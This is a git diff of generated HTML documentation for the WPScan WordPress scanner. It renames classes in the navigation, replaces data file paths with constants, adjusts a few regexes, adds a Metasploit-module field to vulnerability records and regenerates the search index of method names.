CustomOptionParser + + GenerateList GitUpdater + ListGeneratorPlugin + Malwares Object - RpcClient + Plugin + + Plugins + + SvnParser SvnUpdater - Svn_Parser - URI Updater @@ -223,7 +231,7 @@ # File lib/wpscan/wp_plugin.rb, line 20 def initialize(options = {}) options[:vulns_file] = (options[:vulns_file] != nil and options[:vulns_file] != "") ? - options[:vulns_file] : DATA_DIR + "/plugin_vulns.xml" + options[:vulns_file] : PLUGINS_VULNS_FILE options[:vulns_xpath] = "//plugin[@name='$name$']/vulnerability" options[:vulns_xpath_2] = "//plugin" options[:type] = "plugins" diff --git a/doc/WpPlugins.html b/doc/WpPlugins.html index fd762ba4..9f7ce0a2 100644 --- a/doc/WpPlugins.html +++ b/doc/WpPlugins.html @@ -85,6 +85,8 @@README + log + @@ -101,22 +103,28 @@ CacheFileStore - Exploit + CheckerPlugin - Generate_List + CustomOptionParser + + GenerateList GitUpdater + ListGeneratorPlugin + Malwares Object - RpcClient + Plugin + + Plugins + + SvnParser SvnUpdater - Svn_Parser - URI Updater @@ -216,9 +224,9 @@ # File lib/wpscan/modules/wp_plugins.rb, line 24 def plugins_from_aggressive_detection(options) - options[:file] = options[:file] || (options[:full] ? "#{DATA_DIR}/plugins_full.txt" : "#{DATA_DIR}/plugins.txt") + options[:file] = options[:file] || (options[:full] ? PLUGINS_FULL_FILE : PLUGINS_FILE) options[:vulns_file] = (options[:vulns_file] != nil and options[:vulns_file] != "") ? - options[:vulns_file] : DATA_DIR + "/plugin_vulns.xml" + options[:vulns_file] : PLUGINS_VULNS_FILE options[:vulns_xpath] = "//plugin[@name='#{@name}']/vulnerability" options[:vulns_xpath_2] = "//plugin" options[:type] = "plugins" diff --git a/doc/WpReadme.html b/doc/WpReadme.html index 1234db6b..ef5602d7 100644 --- a/doc/WpReadme.html +++ b/doc/WpReadme.html @@ -85,6 +85,8 @@README + log + @@ -101,22 +103,28 @@ CacheFileStore - Exploit + CheckerPlugin - Generate_List + CustomOptionParser + + GenerateList GitUpdater + ListGeneratorPlugin + Malwares Object - RpcClient + Plugin + + Plugins + + SvnParser SvnUpdater - Svn_Parser - URI Updater diff --git a/doc/WpTarget.html b/doc/WpTarget.html index 6737819f..33c062b1 100644 --- a/doc/WpTarget.html +++ b/doc/WpTarget.html @@ -171,6 +171,8 @@ README + log + @@ -187,22 +189,28 @@ CacheFileStore - Exploit + CheckerPlugin - Generate_List + CustomOptionParser + + GenerateList GitUpdater + ListGeneratorPlugin + Malwares Object - RpcClient + Plugin + + Plugins + + SvnParser SvnUpdater - Svn_Parser - URI Updater diff --git a/doc/WpTheme.html b/doc/WpTheme.html index 20e6049a..4e534211 100644 --- a/doc/WpTheme.html +++ b/doc/WpTheme.html @@ -97,6 +97,8 @@ README + log + @@ -113,22 +115,28 @@ CacheFileStore - Exploit + CheckerPlugin - Generate_List + CustomOptionParser + + GenerateList GitUpdater + ListGeneratorPlugin + Malwares Object - RpcClient + Plugin + + Plugins + + SvnParser SvnUpdater - Svn_Parser - URI Updater @@ -295,7 +303,7 @@ # File lib/wpscan/wp_theme.rb, line 25 def initialize(options = {}) options[:vulns_file] = (options[:vulns_file] != nil and options[:vulns_file] != "") ? - options[:vulns_file] : DATA_DIR + "/theme_vulns.xml" + options[:vulns_file] : THEMES_VULNS_FILE options[:vulns_xpath] = "//theme[@name='$name$']/vulnerability" options[:type] = "themes" @version = options[:version] @@ -338,16 +346,17 @@ def self.find_from_css_link(target_uri) response = Browser.instance.get(target_uri.to_s, {:follow_location => true, :max_redirects => 2}) - matches = %r{https?://[^"']+/themes/([^"']+)/style.css}.match(response.body) + matches = %r{https?://[^"']+/([^/]+)/themes/([^"']+)/style.css}.match(response.body) if matches style_url = matches[0] - theme_name = matches[1] + wp_content_dir = matches[1] + theme_name = matches[2] return new(:name => theme_name, :style_url => style_url, - :base_url => style_url, - :path => "", - :wp_content_dir => "" + :base_url => target_uri, + :path => theme_name, + :wp_content_dir => wp_content_dir ) end end@@ -378,7 +387,7 @@ href="http://code.google.com/p/wpscan/issues/detail?id=141">code.google.com/p/wp-# File lib/wpscan/wp_theme.rb, line 78 +# File lib/wpscan/wp_theme.rb, line 79 def self.find_from_wooframework(target_uri) body = Browser.instance.get(target_uri.to_s).body regexp = %r{<meta name="generator" content="([^\s"]+)\s?([^"]+)?" />\s+<meta name="generator" content="WooFramework\s?([^"]+)?" />} diff --git a/doc/WpThemes.html b/doc/WpThemes.html index 8e0675a3..a2f4cd6e 100644 --- a/doc/WpThemes.html +++ b/doc/WpThemes.html @@ -85,6 +85,8 @@README + log + @@ -101,22 +103,28 @@ CacheFileStore - Exploit + CheckerPlugin - Generate_List + CustomOptionParser + + GenerateList GitUpdater + ListGeneratorPlugin + Malwares Object - RpcClient + Plugin + + Plugins + + SvnParser SvnUpdater - Svn_Parser - URI Updater @@ -214,9 +222,9 @@ @@ -652,7 +660,7 @@ href="http://code.google.com/p/wpscan/issues/detail?id=109">code.google.com/p/wp# File lib/wpscan/modules/wp_themes.rb, line 21 def themes_from_aggressive_detection(options) - options[:file] = options[:file] || (options[:full] ? "#{DATA_DIR}/themes_full.txt" : "#{DATA_DIR}/themes.txt") + options[:file] = options[:file] || (options[:full] ? THEMES_FULL_FILE : THEMES_FILE) options[:vulns_file] = (options[:vulns_file] != nil and options[:vulns_file] != "") ? - options[:vulns_file] : DATA_DIR + "/theme_vulns.xml" + options[:vulns_file] : THEMES_VULNS_FILE options[:vulns_xpath] = "//theme[@name='#{@name}']/vulnerability" options[:vulns_xpath_2] = "//theme" options[:type] = "themes" diff --git a/doc/WpTimthumbs.html b/doc/WpTimthumbs.html index 8487b73a..7112a118 100644 --- a/doc/WpTimthumbs.html +++ b/doc/WpTimthumbs.html @@ -87,6 +87,8 @@README + log + @@ -103,22 +105,28 @@ CacheFileStore - Exploit + CheckerPlugin - Generate_List + CustomOptionParser + + GenerateList GitUpdater + ListGeneratorPlugin + Malwares Object - RpcClient + Plugin + + Plugins + + SvnParser SvnUpdater - Svn_Parser - URI Updater diff --git a/doc/WpUser.html b/doc/WpUser.html index d3244912..cacff869 100644 --- a/doc/WpUser.html +++ b/doc/WpUser.html @@ -107,6 +107,8 @@ README + log + @@ -123,22 +125,28 @@ CacheFileStore - Exploit + CheckerPlugin - Generate_List + CustomOptionParser + + GenerateList GitUpdater + ListGeneratorPlugin + Malwares Object - RpcClient + Plugin + + Plugins + + SvnParser SvnUpdater - Svn_Parser - URI Updater diff --git a/doc/WpUsernames.html b/doc/WpUsernames.html index 2b1f585a..1c787742 100644 --- a/doc/WpUsernames.html +++ b/doc/WpUsernames.html @@ -93,6 +93,8 @@ README + log + @@ -109,22 +111,28 @@ CacheFileStore - Exploit + CheckerPlugin - Generate_List + CustomOptionParser + + GenerateList GitUpdater + ListGeneratorPlugin + Malwares Object - RpcClient + Plugin + + Plugins + + SvnParser SvnUpdater - Svn_Parser - URI Updater diff --git a/doc/WpVersion.html b/doc/WpVersion.html index c851d514..67c5c85b 100644 --- a/doc/WpVersion.html +++ b/doc/WpVersion.html @@ -109,6 +109,8 @@ README + log + @@ -125,22 +127,28 @@ CacheFileStore - Exploit + CheckerPlugin - Generate_List + CustomOptionParser + + GenerateList GitUpdater + ListGeneratorPlugin + Malwares Object - RpcClient + Plugin + + Plugins + + SvnParser SvnUpdater - Svn_Parser - URI Updater @@ -325,7 +333,7 @@ etc) def initialize(number, options = {}) @number = number @discovery_method = options[:discovery_method] - @vulns_file = options[:vulns_file] || DATA_DIR + '/wp_vulns.xml' + @vulns_file = options[:vulns_file] || WP_VULNS_FILE @vulns_xpath = "//wordpress[@version='#{@number}']/vulnerability" end diff --git a/doc/WpVulnerability.html b/doc/WpVulnerability.html index 23cade94..6977e586 100644 --- a/doc/WpVulnerability.html +++ b/doc/WpVulnerability.html @@ -89,6 +89,8 @@# File lib/wpscan/wp_version.rb, line 170 def self.version_pattern - '([^\r\n]+[\.][^\r\n]+)' + '([^\r\n"\]+\.[^\r\n"\]+)' endREADME + log + @@ -105,22 +107,28 @@ CacheFileStore - Exploit + CheckerPlugin - Generate_List + CustomOptionParser + + GenerateList GitUpdater + ListGeneratorPlugin + Malwares Object - RpcClient + Plugin + + Plugins + + SvnParser SvnUpdater - Svn_Parser - URI Updater @@ -198,6 +206,19 @@ Attributes
++++ metasploit_modules[RW] ++ ++ + + ++references new(title, references, type) + class="method-args">(title, references, type, metasploit_modules) click to toggle source@@ -263,10 +284,11 @@diff --git a/doc/WpscanOptions.html b/doc/WpscanOptions.html index ed6e2529..f811f947 100644 --- a/doc/WpscanOptions.html +++ b/doc/WpscanOptions.html @@ -131,6 +131,8 @@# File lib/wpscan/wp_vulnerability.rb, line 22 -def initialize(title, references, type) - @title = title - @references = references - @type = type +def initialize(title, references, type, metasploit_modules) + @title = title + @references = references + @type = type + @metasploit_modules = metasploit_modules endREADME + log + @@ -147,22 +149,28 @@ CacheFileStore - Exploit + CheckerPlugin - Generate_List + CustomOptionParser + + GenerateList GitUpdater + ListGeneratorPlugin + Malwares Object - RpcClient + Plugin + + Plugins + + SvnParser SvnUpdater - Svn_Parser - URI Updater diff --git a/doc/created.rid b/doc/created.rid index 28f3e42a..fd5ff4e1 100644 --- a/doc/created.rid +++ b/doc/created.rid @@ -1,43 +1,47 @@ -Fri, 11 Jan 2013 17:41:24 +0100 -./CREDITS Fri, 11 Jan 2013 17:33:10 +0100 -./Gemfile Fri, 11 Jan 2013 17:33:10 +0100 -./lib/browser.rb Fri, 11 Jan 2013 17:40:04 +0100 -./lib/cache_file_store.rb Fri, 11 Jan 2013 17:40:04 +0100 -./lib/common_helper.rb Fri, 11 Jan 2013 17:40:04 +0100 -./lib/environment.rb Fri, 11 Jan 2013 17:40:04 +0100 -./lib/updater/git_updater.rb Fri, 11 Jan 2013 17:40:04 +0100 -./lib/updater/svn_updater.rb Fri, 11 Jan 2013 17:40:04 +0100 -./lib/updater/updater.rb Fri, 11 Jan 2013 17:40:04 +0100 -./lib/updater/updater_factory.rb Fri, 11 Jan 2013 17:40:04 +0100 -./lib/wpscan/exploit.rb Fri, 11 Jan 2013 17:40:04 +0100 -./lib/wpscan/modules/brute_force.rb Fri, 11 Jan 2013 17:40:04 +0100 -./lib/wpscan/modules/malwares.rb Fri, 11 Jan 2013 17:40:04 +0100 -./lib/wpscan/modules/web_site.rb Fri, 11 Jan 2013 17:40:04 +0100 -./lib/wpscan/modules/wp_config_backup.rb Fri, 11 Jan 2013 17:40:04 +0100 -./lib/wpscan/modules/wp_full_path_disclosure.rb Fri, 11 Jan 2013 17:40:04 +0100 -./lib/wpscan/modules/wp_login_protection.rb Fri, 11 Jan 2013 17:40:04 +0100 -./lib/wpscan/modules/wp_plugins.rb Fri, 11 Jan 2013 17:40:04 +0100 -./lib/wpscan/modules/wp_readme.rb Fri, 11 Jan 2013 17:40:04 +0100 -./lib/wpscan/modules/wp_themes.rb Fri, 11 Jan 2013 17:40:04 +0100 -./lib/wpscan/modules/wp_timthumbs.rb Fri, 11 Jan 2013 17:40:04 +0100 -./lib/wpscan/modules/wp_usernames.rb Fri, 11 Jan 2013 17:40:04 +0100 -./lib/wpscan/msfrpc_client.rb Fri, 11 Jan 2013 17:40:04 +0100 -./lib/wpscan/vulnerable.rb Fri, 11 Jan 2013 17:40:04 +0100 -./lib/wpscan/wp_detector.rb Fri, 11 Jan 2013 17:40:04 +0100 -./lib/wpscan/wp_enumerator.rb Fri, 11 Jan 2013 17:40:04 +0100 -./lib/wpscan/wp_item.rb Fri, 11 Jan 2013 17:40:04 +0100 -./lib/wpscan/wp_options.rb Fri, 11 Jan 2013 17:40:04 +0100 -./lib/wpscan/wp_plugin.rb Fri, 11 Jan 2013 17:40:04 +0100 -./lib/wpscan/wp_target.rb Fri, 11 Jan 2013 17:40:04 +0100 -./lib/wpscan/wp_theme.rb Fri, 11 Jan 2013 17:40:04 +0100 -./lib/wpscan/wp_user.rb Fri, 11 Jan 2013 17:40:04 +0100 -./lib/wpscan/wp_version.rb Fri, 11 Jan 2013 17:40:04 +0100 -./lib/wpscan/wp_vulnerability.rb Fri, 11 Jan 2013 17:40:04 +0100 -./lib/wpscan/wpscan_helper.rb Fri, 11 Jan 2013 17:40:04 +0100 -./lib/wpscan/wpscan_options.rb Fri, 11 Jan 2013 17:40:05 +0100 -./lib/wpstools/generate_list.rb Fri, 11 Jan 2013 17:40:05 +0100 -./lib/wpstools/parse_svn.rb Fri, 11 Jan 2013 17:40:05 +0100 -./lib/wpstools/wpstools_helper.rb Fri, 11 Jan 2013 17:40:05 +0100 -./README Fri, 11 Jan 2013 17:33:10 +0100 -./wpscan.rb Fri, 11 Jan 2013 17:34:28 +0100 -./wpstools.rb Fri, 11 Jan 2013 17:34:28 +0100 +Sat, 19 Jan 2013 21:42:06 +0100 +./CREDITS Fri, 11 Jan 2013 21:40:57 +0100 +./Gemfile Wed, 09 Jan 2013 21:35:00 +0100 +./lib/browser.rb Fri, 11 Jan 2013 21:40:57 +0100 +./lib/cache_file_store.rb Fri, 11 Jan 2013 21:40:57 +0100 +./lib/common/custom_option_parser.rb Sat, 19 Jan 2013 12:52:13 +0100 +./lib/common/plugins/plugin.rb Sat, 19 Jan 2013 12:52:13 +0100 +./lib/common/plugins/plugins.rb Sat, 19 Jan 2013 12:52:13 +0100 +./lib/common_helper.rb Sat, 19 Jan 2013 21:27:22 +0100 +./lib/environment.rb Sat, 19 Jan 2013 12:52:13 +0100 +./lib/updater/git_updater.rb Sun, 13 Jan 2013 21:08:52 +0100 +./lib/updater/svn_updater.rb Fri, 11 Jan 2013 21:40:57 +0100 +./lib/updater/updater.rb Mon, 14 Jan 2013 12:42:10 +0100 +./lib/updater/updater_factory.rb Fri, 11 Jan 2013 21:40:57 +0100 +./lib/wpscan/modules/brute_force.rb Fri, 11 Jan 2013 21:40:57 +0100 +./lib/wpscan/modules/malwares.rb Fri, 11 Jan 2013 21:40:57 +0100 +./lib/wpscan/modules/web_site.rb Sat, 19 Jan 2013 18:50:05 +0100 +./lib/wpscan/modules/wp_config_backup.rb Fri, 11 Jan 2013 21:40:57 +0100 +./lib/wpscan/modules/wp_full_path_disclosure.rb Fri, 11 Jan 2013 21:40:57 +0100 +./lib/wpscan/modules/wp_login_protection.rb Fri, 11 Jan 2013 21:40:57 +0100 +./lib/wpscan/modules/wp_plugins.rb Sat, 19 Jan 2013 21:26:26 +0100 +./lib/wpscan/modules/wp_readme.rb Fri, 11 Jan 2013 21:40:57 +0100 +./lib/wpscan/modules/wp_themes.rb Sat, 19 Jan 2013 21:29:48 +0100 +./lib/wpscan/modules/wp_timthumbs.rb Fri, 11 Jan 2013 21:40:57 +0100 +./lib/wpscan/modules/wp_usernames.rb Fri, 11 Jan 2013 21:40:57 +0100 +./lib/wpscan/vulnerable.rb Sun, 13 Jan 2013 20:53:11 +0100 +./lib/wpscan/wp_detector.rb Fri, 11 Jan 2013 21:40:57 +0100 +./lib/wpscan/wp_enumerator.rb Sat, 19 Jan 2013 20:52:04 +0100 +./lib/wpscan/wp_item.rb Sat, 19 Jan 2013 21:29:12 +0100 +./lib/wpscan/wp_options.rb Fri, 11 Jan 2013 21:40:57 +0100 +./lib/wpscan/wp_plugin.rb Sat, 19 Jan 2013 21:26:18 +0100 +./lib/wpscan/wp_target.rb Sat, 19 Jan 2013 18:50:29 +0100 +./lib/wpscan/wp_theme.rb Sat, 19 Jan 2013 21:29:43 +0100 +./lib/wpscan/wp_user.rb Fri, 11 Jan 2013 21:40:57 +0100 +./lib/wpscan/wp_version.rb Sat, 19 Jan 2013 21:30:10 +0100 +./lib/wpscan/wp_vulnerability.rb Sun, 13 Jan 2013 20:53:26 +0100 +./lib/wpscan/wpscan_helper.rb Fri, 11 Jan 2013 21:40:57 +0100 +./lib/wpscan/wpscan_options.rb Fri, 11 Jan 2013 21:40:57 +0100 +./lib/wpstools/plugins/checker/checker_plugin.rb Sat, 19 Jan 2013 21:27:43 +0100 +./lib/wpstools/plugins/list_generator/generate_list.rb Sat, 19 Jan 2013 21:29:25 +0100 +./lib/wpstools/plugins/list_generator/list_generator_plugin.rb Sat, 19 Jan 2013 12:52:13 +0100 +./lib/wpstools/plugins/list_generator/svn_parser.rb Sat, 19 Jan 2013 20:52:04 +0100 +./lib/wpstools/wpstools_helper.rb Sat, 19 Jan 2013 12:52:13 +0100 +./log.txt Sat, 19 Jan 2013 21:33:28 +0100 +./README Sat, 19 Jan 2013 18:50:05 +0100 +./wpscan.rb Sat, 19 Jan 2013 21:10:11 +0100 +./wpstools.rb Sat, 19 Jan 2013 13:13:52 +0100 diff --git a/doc/index.html b/doc/index.html index 092e3d42..3576f3bb 100644 --- a/doc/index.html +++ b/doc/index.html @@ -55,6 +55,8 @@ README + log + @@ -71,22 +73,28 @@ CacheFileStore - Exploit + CheckerPlugin - Generate_List + CustomOptionParser + + GenerateList GitUpdater + ListGeneratorPlugin + Malwares Object - RpcClient + Plugin + + Plugins + + SvnParser SvnUpdater - Svn_Parser - URI Updater diff --git a/doc/js/search_index.js b/doc/js/search_index.js index b0bb0073..a11042ed 100644 --- a/doc/js/search_index.js +++ b/doc/js/search_index.js @@ -1 +1 @@ -var search_data = {"index":{"searchIndex":["array","browser","bruteforce","cachefilestore","exploit","generate_list","gitupdater","malwares","object","rpcclient","svnupdater","svn_parser","uri","updater","updaterfactory","vulnerable","website","wpconfigbackup","wpdetector","wpenumerator","wpfullpathdisclosure","wpitem","wploginprotection","wpoptions","wpplugin","wpplugins","wpreadme","wptarget","wptheme","wpthemes","wptimthumbs","wpuser","wpusernames","wpversion","wpvulnerability","wpscanoptions","<=>()","<=>()","==()","===()","===()","===()","_grep_()","add_http_protocol()","add_trailing_slash()","aggressive_detection()","authenticate()","author_url()","available_updaters_classes()","banner()","basic_auth=()","better_wp_security_url()","bluetrait_event_viewer_url()","brute_force()","changelog_url()","check_options()","choose_session()","clean()","clean_option()","colorize()","config_backup()","config_backup_files()","debug_log_url()","directory_listing?()","enumerate()","enumerate_all_plugins=()","enumerate_all_themes=()","enumerate_only_vulnerable_plugins=()","enumerate_only_vulnerable_themes=()","enumerate_options_from_string()","enumerate_plugins=()","enumerate_themes=()","eql?()","error_404_hash()","error_log?()","error_log_url()","escape()","exploit()","exploit()","exploit_info()","extract_name_from_url()","extract_nickname_from_body()","find()","find()","find_from_advanced_fingerprinting()","find_from_atom_generator()","find_from_css_link()","find_from_links_opml()","find_from_meta_generator()","find_from_rdf_generator()","find_from_readme()","find_from_rss_generator()","find_from_sitemap_generator()","find_from_wooframework()","forge_request()","full_path_disclosure_url()","generate_full_list()","generate_items()","generate_popular_list()","get()","get_entry_file_path()","get_equal_string_end()","get_exploit_info()","get_full_url()","get_nickname_from_response()","get_nickname_from_url()","get_opt_long()","get_options()","get_payloads()","get_popular_items()","get_sub_folder()","get_updater()","get_url_without_filename()","green()","grep()","has_basic_auth?()","has_better_wp_security_protection?()","has_bluetrait_event_viewer_protection?()","has_changelog?()","has_debug_log?()","has_full_path_disclosure?()","has_limit_login_attempts_protection?()","has_login_lock_protection?()","has_login_lockdown_protection?()","has_login_protection?()","has_login_security_solution_protection?()","has_malwares?()","has_options?()","has_readme?()","has_readme?()","has_simple_login_lockdown_protection?()","has_timthumbs?()","has_xml_rpc?()","help()","homepage_hash()","id()","id=()","instance()","is_installed?()","is_installed?()","is_installed?()","is_long_option?()","is_multisite?()","job_id()","jobs()","kill_session()","kill_session()","last_session_id()","limit_login_attempts_url()","lines_in_file()","load_config()","load_from_arguments()","local_revision_number()","local_revision_number()","local_revision_number()","login()","login_protection_plugin()","login_security_solution_url()","login_url()","malware_pattern()","malwares()","malwares_file()","max_threads=()","merge_request_params()","meterpreter_read()","meterpreter_read()","meterpreter_write()","meterpreter_write()","name()","name=()","new()","new()","new()","new()","new()","new()","new()","new()","new()","new()","new()","new()","new()","new()","nickname()","nickname=()","online?()","option_to_instance_variable_setter()","page_hash()","parse()","passive_detection()","plugins_from_aggressive_detection()","plugins_from_passive_detection()","post()","proxy=()","proxy_auth=()","proxy_auth=()","raise_invalid_proxy_format()","raise_must_be_implemented()","read_entry()","read_shell()","read_shell()","readme_url()","readme_url()","red()","redirection()","registration_enabled?()","registration_url()","remove_junk_from_nickname()","repo_directory_arguments()","require_files_from_directory()","reset()","rss_url()","save()","search_replace_db_2_exists?()","search_replace_db_2_url()","session_count()","sessions()","sessions()","set_file_name()","set_option_from_cli()","simple_login_lockdown_url()","start()","targets_url_from_theme()","theme()","themes_from_aggressive_detection()","themes_from_passive_detection()","threads=()","timthumbs()","to_h()","to_s()","update()","update()","update()","url()","url=()","usage()","user_agent()","user_agent_mode=()","usernames()","valid_response_codes()","version()","version()","version_pattern()","vulnerabilities()","wordlist=()","wordpress?()","wp_content_dir()","wp_org_url()","wp_plugins_dir()","wp_plugins_dir_exists?()","write_entry()","write_shell()","write_shell()","xml_rpc_url()","credits","gemfile","readme"],"longSearchIndex":["array","browser","bruteforce","cachefilestore","exploit","generate_list","gitupdater","malwares","object","rpcclient","svnupdater","svn_parser","uri","updater","updaterfactory","vulnerable","website","wpconfigbackup","wpdetector","wpenumerator","wpfullpathdisclosure","wpitem","wploginprotection","wpoptions","wpplugin","wpplugins","wpreadme","wptarget","wptheme","wpthemes","wptimthumbs","wpuser","wpusernames","wpversion","wpvulnerability","wpscanoptions","wpitem#<=>()","wpuser#<=>()","wpitem#==()","wpitem#===()","wptheme#===()","wpuser#===()","array#_grep_()","object#add_http_protocol()","object#add_trailing_slash()","wpdetector::aggressive_detection()","rpcclient#authenticate()","wpusernames#author_url()","updaterfactory::available_updaters_classes()","object#banner()","wpscanoptions#basic_auth=()","wploginprotection#better_wp_security_url()","wploginprotection#bluetrait_event_viewer_url()","bruteforce#brute_force()","wpitem#changelog_url()","wpoptions::check_options()","exploit#choose_session()","cachefilestore#clean()","wpscanoptions::clean_option()","object#colorize()","wpconfigbackup#config_backup()","wpconfigbackup::config_backup_files()","wptarget#debug_log_url()","wpitem#directory_listing?()","wpenumerator::enumerate()","wpscanoptions#enumerate_all_plugins=()","wpscanoptions#enumerate_all_themes=()","wpscanoptions#enumerate_only_vulnerable_plugins=()","wpscanoptions#enumerate_only_vulnerable_themes=()","wpscanoptions#enumerate_options_from_string()","wpscanoptions#enumerate_plugins=()","wpscanoptions#enumerate_themes=()","wpuser#eql?()","website#error_404_hash()","wpplugin#error_log?()","wpplugin#error_log_url()","uri::escape()","exploit#exploit()","rpcclient#exploit()","exploit#exploit_info()","wpitem#extract_name_from_url()","wpusernames#extract_nickname_from_body()","wptheme::find()","wpversion::find()","wpversion::find_from_advanced_fingerprinting()","wpversion::find_from_atom_generator()","wptheme::find_from_css_link()","wpversion::find_from_links_opml()","wpversion::find_from_meta_generator()","wpversion::find_from_rdf_generator()","wpversion::find_from_readme()","wpversion::find_from_rss_generator()","wpversion::find_from_sitemap_generator()","wptheme::find_from_wooframework()","browser#forge_request()","wpfullpathdisclosure#full_path_disclosure_url()","generate_list#generate_full_list()","wpenumerator::generate_items()","generate_list#generate_popular_list()","browser#get()","cachefilestore#get_entry_file_path()","object#get_equal_string_end()","rpcclient#get_exploit_info()","wpitem#get_full_url()","wpusernames#get_nickname_from_response()","wpusernames#get_nickname_from_url()","wpscanoptions::get_opt_long()","rpcclient#get_options()","rpcclient#get_payloads()","generate_list#get_popular_items()","wpitem#get_sub_folder()","updaterfactory::get_updater()","wpitem#get_url_without_filename()","object#green()","array#grep()","website#has_basic_auth?()","wploginprotection#has_better_wp_security_protection?()","wploginprotection#has_bluetrait_event_viewer_protection?()","wpitem#has_changelog?()","wptarget#has_debug_log?()","wpfullpathdisclosure#has_full_path_disclosure?()","wploginprotection#has_limit_login_attempts_protection?()","wploginprotection#has_login_lock_protection?()","wploginprotection#has_login_lockdown_protection?()","wploginprotection#has_login_protection?()","wploginprotection#has_login_security_solution_protection?()","malwares#has_malwares?()","wpscanoptions#has_options?()","wpitem#has_readme?()","wpreadme#has_readme?()","wploginprotection#has_simple_login_lockdown_protection?()","wptimthumbs#has_timthumbs?()","website#has_xml_rpc?()","object#help()","website#homepage_hash()","wpuser#id()","wpuser#id=()","browser::instance()","gitupdater#is_installed?()","svnupdater#is_installed?()","updater#is_installed?()","wpscanoptions::is_long_option?()","wptarget#is_multisite?()","exploit#job_id()","rpcclient#jobs()","exploit#kill_session()","rpcclient#kill_session()","exploit#last_session_id()","wploginprotection#limit_login_attempts_url()","bruteforce::lines_in_file()","browser#load_config()","wpscanoptions::load_from_arguments()","gitupdater#local_revision_number()","svnupdater#local_revision_number()","updater#local_revision_number()","rpcclient#login()","wploginprotection#login_protection_plugin()","wploginprotection#login_security_solution_url()","wptarget#login_url()","malwares::malware_pattern()","malwares#malwares()","malwares::malwares_file()","browser#max_threads=()","browser#merge_request_params()","exploit#meterpreter_read()","rpcclient#meterpreter_read()","exploit#meterpreter_write()","rpcclient#meterpreter_write()","wpuser#name()","wpuser#name=()","cachefilestore::new()","exploit::new()","generate_list::new()","rpcclient::new()","svn_parser::new()","updater::new()","wpitem::new()","wpplugin::new()","wptarget::new()","wptheme::new()","wpuser::new()","wpversion::new()","wpvulnerability::new()","wpscanoptions::new()","wpuser#nickname()","wpuser#nickname=()","website#online?()","wpscanoptions::option_to_instance_variable_setter()","website::page_hash()","svn_parser#parse()","wpdetector::passive_detection()","wpplugins#plugins_from_aggressive_detection()","wpplugins#plugins_from_passive_detection()","browser#post()","wpscanoptions#proxy=()","browser#proxy_auth=()","wpscanoptions#proxy_auth=()","browser#raise_invalid_proxy_format()","updater#raise_must_be_implemented()","cachefilestore#read_entry()","exploit#read_shell()","rpcclient#read_shell()","wpitem#readme_url()","wpreadme#readme_url()","object#red()","website#redirection()","wptarget#registration_enabled?()","wptarget#registration_url()","wpusernames#remove_junk_from_nickname()","gitupdater#repo_directory_arguments()","object#require_files_from_directory()","browser::reset()","website#rss_url()","generate_list#save()","wptarget#search_replace_db_2_exists?()","wptarget#search_replace_db_2_url()","exploit#session_count()","exploit#sessions()","rpcclient#sessions()","generate_list#set_file_name()","wpscanoptions#set_option_from_cli()","wploginprotection#simple_login_lockdown_url()","exploit#start()","wptimthumbs#targets_url_from_theme()","wptarget#theme()","wpthemes#themes_from_aggressive_detection()","wpthemes#themes_from_passive_detection()","wpscanoptions#threads=()","wptimthumbs#timthumbs()","wpscanoptions#to_h()","wpitem#to_s()","gitupdater#update()","svnupdater#update()","updater#update()","wptarget#url()","wpscanoptions#url=()","object#usage()","browser#user_agent()","browser#user_agent_mode=()","wpusernames#usernames()","wptarget::valid_response_codes()","wpitem#version()","wptarget#version()","wpversion::version_pattern()","vulnerable#vulnerabilities()","wpscanoptions#wordlist=()","website#wordpress?()","wptarget#wp_content_dir()","wpitem#wp_org_url()","wptarget#wp_plugins_dir()","wptarget#wp_plugins_dir_exists?()","cachefilestore#write_entry()","exploit#write_shell()","rpcclient#write_shell()","website#xml_rpc_url()","","",""],"info":[["Array","","Array.html","",""],["Browser","","Browser.html","",""],["BruteForce","","BruteForce.html","",""],["CacheFileStore","","CacheFileStore.html","",""],["Exploit","","Exploit.html",""," This library should contain all methods for exploitation.\n"],["Generate_List","","Generate_List.html","","
This tool generates a list to use for plugin and theme enumeration\n"],["GitUpdater","","GitUpdater.html","",""],["Malwares","","Malwares.html","",""],["Object","","Object.html","",""],["RpcClient","","RpcClient.html","","
This library should contain all methods to communicate with msfrpc. See\nframework/documentation/msfrpc.txt …\n"],["SvnUpdater","","SvnUpdater.html","",""],["Svn_Parser","","Svn_Parser.html","","
This Class Parses SVN Repositories via HTTP\n"],["URI","","URI.html","",""],["Updater","","Updater.html","","
This class act as an absract one\n"],["UpdaterFactory","","UpdaterFactory.html","",""],["Vulnerable","","Vulnerable.html","",""],["WebSite","","WebSite.html","",""],["WpConfigBackup","","WpConfigBackup.html","",""],["WpDetector","","WpDetector.html","",""],["WpEnumerator","","WpEnumerator.html","","
Enumerate over a given set of items and check if they exist\n"],["WpFullPathDisclosure","","WpFullPathDisclosure.html","",""],["WpItem","","WpItem.html","",""],["WpLoginProtection","","WpLoginProtection.html","",""],["WpOptions","","WpOptions.html","","
Options Hash\n
Options\n
url- The base URL of the WordPress site\n"],["WpPlugin","","WpPlugin.html","",""],["WpPlugins","","WpPlugins.html","",""],["WpReadme","","WpReadme.html","",""],["WpTarget","","WpTarget.html","",""],["WpTheme","","WpTheme.html","",""],["WpThemes","","WpThemes.html","",""],["WpTimthumbs","","WpTimthumbs.html","",""],["WpUser","","WpUser.html","",""],["WpUsernames","","WpUsernames.html","",""],["WpVersion","","WpVersion.html","",""],["WpVulnerability","","WpVulnerability.html","",""],["WpscanOptions","","WpscanOptions.html","",""],["<=>","WpItem","WpItem.html#method-i-3C-3D-3E","(other)","Compare\n"],["<=>","WpUser","WpUser.html#method-i-3C-3D-3E","(item)",""],["==","WpItem","WpItem.html#method-i-3D-3D","(other)","
Compare\n"],["===","WpItem","WpItem.html#method-i-3D-3D-3D","(other)","
Compare\n"],["===","WpTheme","WpTheme.html#method-i-3D-3D-3D","(wp_theme)",""],["===","WpUser","WpUser.html#method-i-3D-3D-3D","(item)",""],["_grep_","Array","Array.html#method-i-_grep_","(regexp)","
Fix for grep with symbols in ruby <= 1.8.7\n"],["add_http_protocol","Object","Object.html#method-i-add_http_protocol","(url)","
Add protocol\n"],["add_trailing_slash","Object","Object.html#method-i-add_trailing_slash","(url)",""],["aggressive_detection","WpDetector","WpDetector.html#method-c-aggressive_detection","(options, items = [])",""],["authenticate","RpcClient","RpcClient.html#method-i-authenticate","()","
check authentication\n"],["author_url","WpUsernames","WpUsernames.html#method-i-author_url","(author_id)",""],["available_updaters_classes","UpdaterFactory","UpdaterFactory.html#method-c-available_updaters_classes","()","
